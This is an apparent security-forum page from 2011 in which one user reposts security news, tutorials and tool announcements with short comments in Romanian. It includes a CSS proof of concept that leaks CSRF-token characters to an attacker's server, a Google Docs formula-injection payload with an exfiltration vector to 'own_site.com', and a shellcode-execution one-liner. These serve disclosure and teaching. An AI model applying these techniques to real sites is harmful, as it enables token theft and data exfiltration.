Nytro

[h=4]Securitytube Metasploit Framework Expert ( Armitage )[/h] Description: This video, part of the SecurityTube Metasploit Framework Expert series, introduces Armitage. You'll learn the basic use of Armitage and see a demonstration. This video also covers some of the advanced features: dynamic workspaces, team collaboration, and reporting. Sursa: Securitytube Metasploit Framework Expert ( Armitage ) Da, tutorial despre Armitage...

[h=4]Execute Binary In The Alternate Data Stream[/h]Un truc simplu si posibil util. Description: Since Vista the start-command ist forbidden for ADS. Here a workaround Sursa: Execute Binary In The Alternate Data Stream

[h=4]How Not To Implement Cryptography For The Owasp Top 10[/h] Description: How NOT to Implement Cryptography for the OWASP Top 10 (Reloaded) with Anthony J. Stieber Sursa: How Not To Implement Cryptography For The Owasp Top 10

Backdoor in Android for No-Permissions Reverse Shell Security expert Thomas Cannon working at viaForensics as the Director of R&D has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes. Thomas built an app which requires no permissions and yet is able to give an attacker a remote shell and allow them to execute commands on the device remotely from anywhere in the world. The functionality they are exploiting to do this is not new, it has been quietly pointed out for a number of years, and was explained in depth at Defcon 18. It is not a zero-day exploit or a root exploit. They are using Android the way it was designed to work, but in a clever way in order to establish a 2-way communication channel. This has been tested on Android versions ranging from 1.5 up to 4.0 Ice Cream Sandwich, and it works in a similar way on all platforms. The application operates by instructing the browser to access a particular web page with specific parameters. This web page, and the server behind it, will, in turn, control the app by forwarding the browser to a URL that starts with a protocol prefix that is registered as being handled by the app, for example app://. This process can then be repeated and in doing so it enables two-way communication. "In this demonstration Android’s power and flexibility were perhaps also its downfall. Other smartphone platforms may not offer the controls we are bypassing at all, and the multi-tasking capabilities in Android allowed us to run the attack almost transparently to the user. This power combined with the open nature of Android also facilitates the customisation of the system to meet bespoke security requirements. This is something we have even been involved in ourselves by implementing a proof of concept Loadable Kernel Module to pro-actively monitor and defend a client’s intellectual property as it passed through their devices. It is no surprise that we have seen adoption of Android research projects in the military and government as it can be enhanced and adapted for specific security requirements, perhaps like no other mobile platform before it." Thomas Cannon said. Sursa: Backdoor in Android for No-Permissions Reverse Shell | The Hacker News (THN)

CSS - The sexy assasin Tactical Exploitation using CSS Old Attacks New Research New Attacks Download: http://www.megaupload.com/?d=2E0FY6BJ De interes: Access DOM attributes using CSS: This example is just a very simple proof of concept -- showing that we can enumerate arbitrary attribute value characters. It performs five positive tests and one negative test. Just to be sure. Now, what happens here? First of all you see an animation, resizing a pack of boxes. This is necessary because of a render bug in Webkit -- but not necessarily important for the attack itself. I just had to implement it because of a faulty dimensioning of boxes applied with external fonts. So -- the essence of the attack is, that we cam map attribute content into the DOM by using CSS :after and content:attr(href) for example. This mapped attribute content can be styled with a custom font. The magic is in those fonts - each font is only supplied with one visible character - and all other characters having zero dimension. That means that only the dimensioned character will be displayed and all others won't. @font-face { font-family: TestS; src: url(test_S.svg#TestS) format("svg"); } @font-face { font-family: TestE; src: url(test_E.svg#TestE) format("svg"); } @font-face { font-family: TestC; src: url(test_C.svg#TestC) format("svg"); } @font-face { font-family: TestR; src: url(test_R.svg#TestR) format("svg"); } @font-face { font-family: TestZ; src: url(test_Z.svg#TestZ) format("svg"); } @font-face { font-family: TestT; src: url(test_T.svg#TestT) format("svg"); } div { border: 1px solid red; height: 20px; overflow-x: none; overflow-y: auto; -webkit-animation-duration: 5s; -webkit-animation-name: decrease; } div a:after { color:white; } div.a a:after { content: attr(href); font-family: TestS; } div.b a:after { content: attr(href); font-family: TestE; } div.c a:after { content: attr(href); font-family: TestZ; } div.d a:after { content: attr(href); font-family: TestT; } div.e a:after { content: attr(href); font-family: TestC; } div.f a:after { content: attr(href); font-family: TestR; } So -- only if a character existing in that font is part of the attribute value, the mapped content will have dimension. If we squeeze the box a bit, we will get a scrollbar. But only if the font-character match is given This is one of those magic "only one char has dimension" fonts I created for the PoC, testing for the letter S: http://html5sec.org/webkit/test_S.svg That "one char only dimension" thing connected with the squeezing means, if we can find out, when the scrollbar appears, we can know which character is part of the attribute value. Now - how can we create a scrollbar, that is able to notify an external resource the second it starts to appear? Well, Webkit has a special feature that allows to fully style scrollbars. We can of course also define a background image for a scrollbar. Too bad is just, that if we do that, the image will be fetched onload. So it's more or less useless. But -- Webkit also supports tons of pseudo classes for scrollbar styles (srsly - tons: http://trac.webkit.org/export/41842/trunk/LayoutTests/scrollbars/overflow-scrollbar-combinations.html - I mean, you know it already I assume . And some of those make sure that background images assigned to the selected elements and states will only be loaded once they actually appear. Bam -- there we have our smart scrollbar of doom. div::-webkit-scrollbar { width: 12px; } div.a::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/S); } div.b::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/E); } div.c::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/Z); } div.d::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/T); } div.e::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/C); } div.f::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/R); } Now if we glue the whole thing together, we simply need the following ingredients: * A CSS injection * Some or two CSRF protected links with a token * One SVG font per character to determine * A server listening for incoming requests The SVG fonts were chosen since they are insanely easy to create. Just set the path and some attributes of any glyph but the desired one to null and done -- we have the perfect font where every character but one is invisible. The animation has to be there because of the aforementioned dimensioning bug - if there's no animation, the background image requests will fire even for those characters tests who don't result in a visible character. @-webkit-keyframes decrease { from { width: 340px; } 50% { width:105px; } 100% { width:340px; } } To fully enjoy the demo, make sure you have a look at the Network tab in the developer tools. You'll see requests for the characters S,E,C,R,T - but none for Z. Z was referenced in the demo with a dedicated test as well. This is our negative test proving that it really works. So - conclusion: We can enumerate characters via CSS -- that is not new since SDC et al. did this with the Sexy Assassin back in 2009 (was it?). With Webkit nevertheless we can do it FAST and without a massive footprint. My suggestion for a fix would be: simply make sure that scrollbars and their numerous components and states cannot request external resources once they appear/change state -- but fetch their stuff onload so we can avoid attacks like these. The only think making this attack work is the fact that some parts of the scrollbar loads data from an external machine on visibility/appearance -- and not on declaration in the style-sheet. Sursa: http://html5sec.org/webkit/test

[h=3]Excel formula injection in Google Docs[/h][h=2]December 21, 2011[/h] Surely all of you know about Google reward program for information security researchers who provide information about weak spots of Google resources. We had the chance to participate in this program, too. Here is a short story from @_chipik and @asintsov. One day we needed to conduct a small survey, and we decided to use Google Docs as platform for the survey. There is an object in Google Docs called Google Forms, and, as obvious from the name, it is used to create various surveys and tests forms. After a form is created, its URL is published on the Internet or sent to people who are to participate in the survey. This is how the form looks for a participant: And this is how the author sees the participant's answers: I suppose that any web researcher upon seeing a form instinctively puts ‘,",> and other interesting symbols here? We tried it, too. However, everything was encoded and filtered exactly as planned. Well… But all of user input is inserted into an Excel table, so why don't we try to inject some formula? Excel formulas start with an “=”. OK, let’s give it a try. Fail. Cunning Google puts a space symbol before the "=" so that the formula is taken for a simple text cell. So how do we get rid of the space? Easy as pie: use backspace %08 is the Hex code of the backspace key. Thus, we wrote in the entry field: %08=1+2+C3 Voila! The formula got inserted into the table just fine. All we had to do now was devise an interesting and practical vector for this particular injection. Google Functions helped us here. With the help of Google Functions it was possible to execute a request to any domain so that the request results got inserted into a specified cell. That gave us the following attack vector: 1) Put sensitive user data into A1 cell (or probably they are already there) 2) Put a formula which makes GET request to http://own_site.com/secret_data_in_base64 into Z666 cell. 3) Read web server logs, get data from cells. 4) Profit! Soon after describing the bug and the possible attack vector we got the following letter: And a bit later we saw our names in Google Hall of Fame Finally, a little Google Hack Posted by DSecRG Sursa: Digital Security Research Group: Excel formula injection in Google Docs

[h=2]Metasploit Tutorial: An introduction to Metasploit Community[/h]Posted by Christian Kirsch on Dec 21, 2011 7:50:48 AM Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product. Scanning Networks with Metasploit Community Basic Exploitation with Metasploit Community Basic Exploitation vs. Smart Exploitation Importing Nexpose Scan Data into Metasploit Using Metasploit Community with Nexpose If you don't have them already, download the free Metasploit Community Edition penetration testing tool and the free Nexpose Community Edition vulnerability scanner now! Videos: https://community.rapid7.com/community/solutions/metasploit/blog/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community

Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 A developer who calls himself T Rizk doesn't have much faith in Congress making the right decision on anti-piracy legislation, so he's built a work around for the impending censorship measures being considered DeSOPA. The Firefox add-on is stunningly simple as the Stop Online Piracy Act (SOPA) would block specific domain names (e.g. Download music, movies, games, software! The Pirate Bay - The world's most resilient BitTorrent site) of allegedly infringing sites. Firefox, which already boasts an outspoken stance against SOPA, and has already shown they are willing to stand by add-on developers who create circumvention extensions designed to go around measures currently employed by Homeland Security, has welcomed a new add-on, one that is designed to circumvent whatever SOPA website blacklists that are created, provided the bills become law. A new anti-SOPA add-on for Firefox, titled “DeSopa” is such a counter measure.When installed, users can click a single button to resolve a blocked domain via foreign DNS servers, bypassing all domestic DNS blockades and allowing the user to browse the site though the bare IP-address (if supported).“I feel that the general public is not aware of the gravity of SOPA and Congress seems like they are about to cater to the special interests involved, to the detriment of Internet, for which I and many others live and breathe,” DeSopa developer T Rizk told. “It could be that a few members of congress are just not tech savvy and don’t understand that it is technically not going to work, at all. So here’s some proof that I hope will help them err on the side of reason and vote SOPA down,” he adds. If SOPA is implemented, thousands of similar and more innovative programs and services will sprout up to provide access to the websites that people frequent. SOPA is a mistake. It does not even technically help solve the underlying problem, as this software illustrates. What it will do is give undue leverage to predatory organizations, cripple innocent third party websites, severely dampen digital innovation and negatively impact the integrity and security of the Internet. If browsing a site through a single IP address is not supported, this other anti-SOPA plugin provides an alternative. Sursa: Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 | The Hacker News (THN)

Hunting malware with Volatility v2.0 Frank Boldewin CAST Forum December 2011 (English edition) What is Volatility? - Forensics framework to acquire digital artifacts from memory dumps - Completely written in Python - Current stable version is 2.0.1 - Easy to use plugin interface - Supports the following x86 Windows versions - Windows XP SP 2, 3 - Windows 2003 Server SP 0, 1, 2 - Windows Vista SP 0, 1, 2 - Windows 2008 Server SP 1, 2 - Windows 7 SP 0, 1 Download: http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf Sursa: CAST Slides: Hunting malware with Volatility v2.0 | Offensive Computing

A simple HTML tag will crash 64-bit Windows 7 0-day leaves kernel in the wrong iframe of mind By John Leyden An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash. The memory corruption bug in x64 Win 7 could also allow malicious kernel-level code to be injected into machines, security alert biz Secunia warns. Fortunately the 32-bit version of Windows 7 is immune to the flaw, which has been pinned down to the win32k.sys operating system file - which contains the kernel portion of the Windows user interface and related infrastructure. Proof-of-concept code showing how to crash vulnerable Win 7 boxes has been leaked: the simple HTML script, when opened in Apple's Safari web browser, quickly leads to the kernel triggering a page fault in an unmapped area of memory, which halts the machine at a blue screen of death. The offending script is just an IFRAME tag with an overly large height attribute. Although Safari is required to spark the system crash via HTML, modern operating systems should not allow usermode applications to bring down the machine. Microsoft is now investigating the vulnerability, which was first reported by Twitter user w3bd3vil, although the software giant is racing against hackers tracing the code execution path to discover the underlying vulnerability in Windows 7. A video of the Safari-triggered crash along with the HTML PoC can be . Other exploit scenarios might also be possible.Demo: Sursa: A simple HTML tag will crash 64-bit Windows 7 • The Register More info: http://www.pcworld.com/businesscenter/article/246767/new_zeroday_vulnerability_in_windows_7_64bit_may_allow_remote_code_execution.html

[h=1]SSLyze: A Fast and Full-Featured SSL Scanner![/h]by Mayuresh on December 21, 2011 When we wrote the “list of SSL scanners for penetration testers” post, in August this year, little did we know that we would have to update it this soon. We have since updated the list with SSLyze, a fast and full featured SSL scanner. It is brought to us by the iSEC Partners. SSLyze is a stand-alone Python application that looks for classic SSL mis-configurations, while providing the advanced user with the opportunity to customize the application via a simple plugin interface. This open source, cross-platform tool will help you with analyzing the configuration of SSL servers and for identifying mis-configurations such as the use of outdated protocol versions, weak hash algorithms in trust chains, insecure renegotiation, and session resumption settings. [h=2]Features of SSLyze:[/h] Insecure renegotiation testing Scanning for weak strength ciphers Checking for SSLv2, SSLv3 and TLSv1 versions Server certificate information dump and basic validation Session resumption capabilities and actual resumption rate measurement Support for client certificate authentication Simultaneous scanning of multiple servers, versions and ciphers For example, SSLyze can help user’s identify server configurations vulnerable to THC’s recently released SSL DOS attack, by checking the server’s support for client-initiated re-negotiations. As we have already mentioned, it is cross-platform. It supports 64-bit and 32-bit Windows and Linux operating systems. All it needs is the following sets of packages: Windows: Python 2.6 or 2.7 and OpenSSL 1.0.0c Linux: Python 2.6 or 2.7 and OpenSSL 0.9.8+ [h=3]Install SSLyze:[/h] # yum install python26 openssl # wget http://sslyze.googlecode.com/files/sslyze-0.3_src.zip # unzip sslyze-0.3_src.zip # cd sslyze-0.3_src [h=3]SSLyze usage:[/h] $ python sslyze.py [options] www.target1.com www.target2.com:443 It supports the following options to provide a granular control: Regular Scan “–regular“: Performs a regular scan. It’s a shortcut for –sslv2 –sslv3 –tlsv1 –reneg –resum –certinfo=basic. OpenSSL Cipher Suites “–sslv2“, “–sslv3“, “–tlsv1“: Lists the SSL 2.0 / SSL 3.0 / TLS 1.0 OpenSSL cipher suites supported by the server. Session Renegotiation “–reneg“: Checks whether the server is vulnerable to insecure renegotiation. Session Resumption “–resum“: Tests the server for session resumption support, using both session IDs and TLS session tickets (RFC 5077). Session Resumption Rate “–resum_rate“: Estimates the average rate of successful session resumptions by performing 100 session resumptions. Server Certificate “–certinfo=basic“: Verifies the server’s certificate validity against Mozilla’s trusted root store, and prints relevant fields of the certificate. Additional options providing client certificate support and connection timeout variables are also available. [h=3]Download SSLyze:[/h] SSLyze v0.3 – sslyze-0.3_src.zip – Downloads - sslyze - Fast and Full-Featured SSL Scanner - Google Project Hosting Sursa: SSLyze: A Fast and Full-Featured SSL Scanner! — PenTestIT

Reversing Microsoft patches to reveal vulnerable code Harsimran Walia Computer Security Enthusiast The paper would try to reveal the vulnerable code for a particular disclosed vulnerability, which is the first and foremost step for making undisclosed exploit and patch verification. The process used herein could be used to create vulnerability based signatures which are far better than exploit signatures. Vulnerability signature is a superset of all the inputs satisfying a particular vulnerability condition whereas exploit based signature would only cater to one type of input satisfying that vulnerability condition. This paper would try to pin point the vulnerable code and the files in Microsoft products by reverse engineering the Microsoft patches. The method used would be to take a binary difference of the file which was patched taken at two different instances, one is the most recent file before patching and the second is after applying the patch but finding the two files is in itself another problem. Windows now releases two different versions of patches, GDR (General distribution) which contains only security related updates and the other QFE (Quick Fix Engineering) or LDR (Limited Distribution Release) which has both security related and functional updates. The problem addressed is that the versions of the two files to be compared should match that is either both should be GDR or LDR. The file after patching can be obtained by extracting the patch of the considered vulnerability. The second file to be compared with a matching version with the first one could be extracted from some other vulnerability patch addressing the issue with the same software disclosed just before the vulnerability considered. The process of extraction of files from patches differs in Vista and Windows 7 from the traditional way used in Windows XP. After obtaining the correct files to be compared, the next step would be to get a binary difference between the files which can be done very easily and effectively with the use of a tool called DarunGrim. The tool provides a well illustrated difference between the subroutines in the term of percentage match between them. Subroutines from both the files can be viewed in graph mode and can be compared to find the vulnerability. The change in the code is done to fix that particular vulnerability which may be removal of a piece of code and addition of another. Another problem arises at this point is that compiler optimizations happen every-time a code is compiled, so if both the files are compiled with different compilers or compiler versions, they would have different compiler optimizations and that would also show up as a change in code. Simple Instruction reordering keeps happening over different releases which give rise to another problem as when only the instructions are reordered, still it would show up as changed code. The code change in one of the functions out of several functions in the file before applying the patch would be the vulnerable code. From here knowledge of the reverse engineer would come into play as how effectively and fast he can find the vulnerability from the code shown as being changed from the previous file. Till now the process used was static analysis but from now onwards dynamic analysis would be used as breakpoints could be set at these changed functions and run the software. When a breakpoint is hit we can check in which of the functions is user input being dealt. Obtaining all this information can then be used to write an exploit. This process of reversing the patch and finding the details about the vulnerability would definitely help in creating vulnerability signatures. Download: http://nullcon.net/nullcon2011presentation/harsimranwalia_nullcon.pdf

[h=1]libemu – x86 Shellcode Emulation[/h] libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion/prevention detections and honeypots. libemu supports: Executing x86 instructions Reading x86 binary code Register emulation Basic FPU emulation [*]Shellcode execution Shellcode detection Using GetPC heuristics Static analysis Binary backwardstraversal [*]Win32 API hooking With libemu one can: Detect shellcodes Execute the shellcodes Profile shellcode behaviour Download: http://sourceforge.net/projects/nepenthes/files/libemu%20development/0.1.0/ Sursa si Info: libemu – x86 Shellcode Emulation

E util cand vezi niste sintaxe mai urate si iti e lene sa aranjezi codul sa il intelegi. (*(void(*)()) SC)();

Super, ceva in romana... Ceva in engleza: MEGAUPLOAD - The leading online storage and file delivery service

Nu ma pricep, dar parca trebuia (neaparat) sa ii faci jailbreak.

Iti recomand sa te axezi pe un singur limbaj, maixm 2: unul de programare - C++ si unul de scripting/Web - PHP. Dar si C#-ul e util daca vrei sa faci ceva rapid si usor. Bun venit.

Mail de cocalari: h4ck3r@expect-us.net Formular de contact fara CAPTCHA, probabil vulnerabil la CRLF: Contact Gramatica 1337: "Tutorialz" Meniu penibil facut cu cine stie ce porcarie: "Gooey Menu script" Design-ul inseamna niste tabele de faceam in clasa a IX-a. Pe scurt: rahat.

Ca sa dai submit, alege una dintre variantele: <form id="form" name="send" action="http://www.google.ro/" method="post"> <input type="text" name="2"/> <input name="buton" id="btn" type="submit" value="Submit" /> </form> <script> document.forms[0].submit(); document.send.submit(); document.getElementById("form").submit(); // Sau apesi butonul document.forms[0].buton.click(); document.send.buton.click(); document.getElementById("btn").click(); </script> Ca sa dai submit dupa 2 secunde: <script> // Functie care da submit function Dupa2Secunde() { document.forms[0].submit(); } // Apel dupa 2 secunde setInterval(Dupa2Secunde, 2000); </script>

Metasploit on Amazon Kindle December 18, 2011 Since Nmap and Ruby is working on Kindle (check my previous posts how I’ve done that), next step is Metasploit – of course! Let me tell you immediately, no patches to Metasploit needed. You can run full blown version of Metasploit with Kindle’s 256 MB of RAM, but dont’ expect miracles. Download http://ftp.linux.hr/kindle/ruby-1.9.3-p0-kindle-bin.tar.bz2 http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2 Install Create opt directory and extract files there mkdir /mnt/us/opt && cd /mnt/us/opt tar xvjf ruby-1.9.3-p0-kindle.tar.bz2 tar xvjf framework-latest.tar.bz2 Test that you have following directory structures: /mnt/us/opt/msf/ /mnt/us/opt/ruby-1.9.3-p0/ export HOME=/mnt/us and run metasploit cd /mnt/us/opt/msf3/ ../ruby-1.9.3-p0/bin/ruby msfconsole I have made small script in /mnt/us/opt which starts msf, so I don’t have to do it every time. It’s straightforward: [INDENT] #!/bin/sh export HOME=/mnt/us cd /mnt/us/opt/msf ../ruby-1.9.3-p0/bin/ruby msfconsole [/INDENT] Let me know if it works for you! Sursa: Metasploit on Amazon Kindle

[h=1]Remove passwords and restrictions from secured PDF files[/h] PDFUnlock! is a free web site that removes restrictions from PDF files. Link: http://www.pdfunlock.com/ Nu stiu daca merge, incercati daca aveti nevoie.

[h=1]Download Firefox 9.0 Final for Linux[/h]December 20th, 2011, 07:35 GMT · By Marius Nestor Mozilla unofficially released last evening, December 19th, the highly anticipated Mozilla Firefox 9.0 web browser for Linux, Mac OS X and Windows operating systems. There's no official announcement yet, but the binary and source archives of the final version of Mozilla Firefox 9.0 were made available for download on the official FTP site of the Mozilla company. Highlights of Mozilla Firefox 9.0: · Added Type Inference, radically improving the JavaScript performance; · Do Not Track status can now be queried via JavaScript; · font-stretch support was added; · text-overflow support was improved; · HTML5, CSS, and MathML support was improved; · Various stability issues were fixed. Download Firefox 9.0 for Linux binaries and sources right now from Softpedia. Also, don't forget to visit our always up-to-date Firefox Extensions section for the latest add-ons! Download: http://linux.softpedia.com/get/Internet/HTTP-WWW-/Mozilla-Firefox-8-20864.shtml Sursa: Download Firefox 9.0 Final for Linux - Softpedia

[h=1]Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS)[/h] Jeff Darcy has written a while back about the (lack of) security in NoSQL database. Unfortunately things haven’t changed much and if you check the NoSQL + Node.js applications I’ve posted lately you’ll notice that some of them are completely ignoring security. And there are some people realizing the risks and starting to express their concerns: Playing with MongoDB lately, I’m getting scared. Because I’m seeing some really bad practices out there. Seeing it in live code. In tutorials. Bryan Sullivan (Senior Security Researcher, Adobe Secure Software Engineering Team) has published a paper (PDF) explaining some of the possible server-side JavaScript injection attacks and the risks the apps and the data are exposed to. Teaser: he can do pretty much everything. It should be noted that exploitation of server-side JavaScript injection vulnerabilities is more like that of SQL injection than of cross-site scripting. SSJS injection does not require any social engineering of an intermediate victim user the way that reflected XSS or DOM-based XSS do; instead, the attacker can attack the application directly with arbitrarily created HTTP requests. Because of this, defenses against SSJS injection are also similar to SQL injection defenses: Avoid creating “ad-hoc” JavaScript commands by concatenating script with user input. Validate user input used in SSJS commands with regular expressions. Avoid use of the JavaScript eval command. In particular, when parsing JSON input, use a safer alternative such as JSON.parse. Remember there’s no such thing as security through obscurity. Sursa: Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS) • myNoSQL

JPC is the fast pure Java™ x86 PC emulator Use JPC to boot virtual computers right here in your browser.... JPC creates a virtual computer upon which you can install your favorite operating system in a safe, flexible and powerful way. It aims to give you complete control over your favorite PC software's execution environment, whatever your real hardware or operating system, and JPC's multi-layered security makes it the safest solution for running the most dangerous software in quarantine - ideal for protecting your machine from malicious or unstable software. Read more about JPC - since it's launch at JavaOne 2007, JPC can now boot many more operating systems (including graphical linuxes) and it's much faster. Download: http://jpc.sourceforge.net/download_download.html Sursa: JPC

[h=1]Virtual Machine Security - VMware Security Hardening[/h]By Irfan Shakeel Virtual machines are very common in the enterprise and even for home user, most common virtual machines are VMware and virtual box in both machines security is an essential part. Security of a virtual machine is also important as the security of host machine. There are different Hardening tips are available for virtual machine (VMware) and in this article we will discuss the basic security tips for VMware. Virtualization is complex and there are many moving parts. I can not speak to all the details of hardening a VMware environment but I can speak to the minimum things to consider when installing or maintaining a VMware environment. For more advice, look at these documents: vSphere 4.0 Security Hardening Guide Security Configuration Benchmarks for VMware ESX 4 PCI DSS Virtualiztion Guidelines A Guide to Virtualization Hardening Guides [h=3]A Typical ESX Environment[/h] A typical ESX environment will have one or more ESX servers connected to a shared storage system such as a fiber channel or iSCSI SAN. Each ESX server will have one or more guest operating systems, each with VMware tools and a myriad of applications installed. This can be seen in the figure below: In this environment there are three major areas of concern: the storage system, the ESX servers, and the guest operating systems. [h=3]Storage Systems[/h] Four things to think about with storage systems are data availability, traffic isolation, the security levels of the ESX servers sharing the storage systems, and which ESX servers are allowed to see which data sets. [h=4]Data Availability[/h] Whatever storage system is used, fiber channel or iSCSI, ensure there are multiple data paths between the storage system and the ESX servers. This includes dual controllers on the SAN, dual switches, redundant power sources for the SAN, and dual host bus adapters (HBA) on the ESX server. It is not enough to have a single HBA with dual ports, two HBAs are necessary. Before the system goes into production, testing should be done to ensure a single device failure does not prevent the ESX server from accessing the data. [h=4]Traffic Isolation[/h] Traffic isolation is of particular concern in iSCSI systems because they use the same basic infrastructure as a standard network. All iSCSI traffic should be segmented from the rest of the network traffic to prevent an attacker from sniffing the iSCSI data. I am not a fan of using VLANs to segment traffic of differing security levels and always recommend physically segmenting iSCSI traffic from the rest of the network. [h=4]Shared Storage for ESX Servers with Differing Security Levels[/h] ESX servers in differing security levels are configured and maintained differently. An ESX server setup as a lab environment is not going to be hardened to the same level as an ESX server holding the companies production systems and those two ESX servers should not share the same storage. An attacker who gained access to the weaker ESX server could use it to attempt to gain access to the production data on the shared storage system. [h=4]Share Data Volumes with the Appropriate ESX Servers[/h] On a typical SAN, multiple data volumes are configured and each one is assigned a SCSI logical unit number (LUN), which is used to uniquely identify that volume. The SAN can then be configured to only allow specific HBAs to access specific LUNs. As an example, in a group of ESX servers only two of those servers may need access to the LUN that holds the HR data, the SAN should be configured so only the HBAs in those ESX servers have access to the LUN with HR data. [h=3]Conclusion[/h] As stated earlier there are three major areas of concern with a production VMware environment, the storage system, the ESX servers, and the guest operating systems. I will discuss the latter two in upcoming blog entries. For now, remember to configure and test multiple paths to the data on the storage system, to isolate iSCSI traffic from the rest of the network, to keep ESX servers of differing security levels from sharing the same storage system, and to only share data sets with the appropriate ESX servers. About the Author Stephen has over ten years experience in the information technology field working as a programmer, technical trainer, network operations manager, and information security consultant. He holds a Bachelor of Science in Math and a number of industry certifications, including the Certified Information Systems Security Professional(CISSP), Offensive Security Certified Professional(OSCP), and GIAC Penetration Tester(GPEN). Sursa: Virtual Machine Security - VMware Security Hardening | Ethical Hacking-Your Way To The World Of IT Security